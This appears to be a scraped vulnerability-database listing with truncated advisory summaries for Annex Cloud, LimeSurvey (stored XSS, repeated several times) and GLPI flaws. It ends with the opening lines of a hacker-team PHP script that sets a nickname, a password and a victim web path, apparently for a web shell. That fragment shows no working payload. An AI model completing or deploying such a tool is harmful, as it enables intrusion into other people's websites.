CVE-2021-31928

Annex Cloud Loyalty Experience Platform 2021.1.0.1 allows any authenticated attacker to escalate privileges to superadministrator. It was fixed in v2021.1.0.2...

EUVD-2006-0924

Malware in sbrugna...

CVE-2022-48010

LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting XSS vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into...

The vulnerability of the GLPI system’s request and incident handling process, related to improper authorization, allows a malicious actor to escalate their privileges within the application.

The vulnerability of the GLPI request and incident handling system is related to the absence of an authorization mechanism that allows users with the “Technical Specialist” profile to view and generate a personal token for the superadministrator. Exploiting this vulnerability could enable a...

CVE-2022-48010

LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting XSS vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into...

CVE-2022-48010

LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting XSS vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into...

CVE-2022-48010

LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting XSS vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into...

CVE-2022-48010

Summary (CVE-2022-48010) LimeSurvey v5.4.15 contains a stored XSS vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. A crafted payload placed into Description or Welcome-message text fields can execute arbitrary script/HTML in the victim’s bro...

CVE-2022-48010

LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting XSS vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into...

CVE-2021-31928

Annex Cloud Loyalty Experience Platform 2021.1.0.1 allows any authenticated attacker to escalate privileges to superadministrator. It was fixed in v2021.1.0.2...

CVE-2021-31928

Annex Cloud Loyalty Experience Platform 2021.1.0.1 allows any authenticated attacker to escalate privileges to superadministrator. It was fixed in v2021.1.0.2...

eaea.class.php.txt

|| Raza Mexicana Hackers Team - http://www.raza-mexicana.org / // Just change this vars ------------------------------ $hackernick = 'hax0r'; $hackerpass = 'eaea'; $basepathurl = "/home/victim/publichtml/"; -- ending slash // ---------------------------------------------------- $body = END ?php...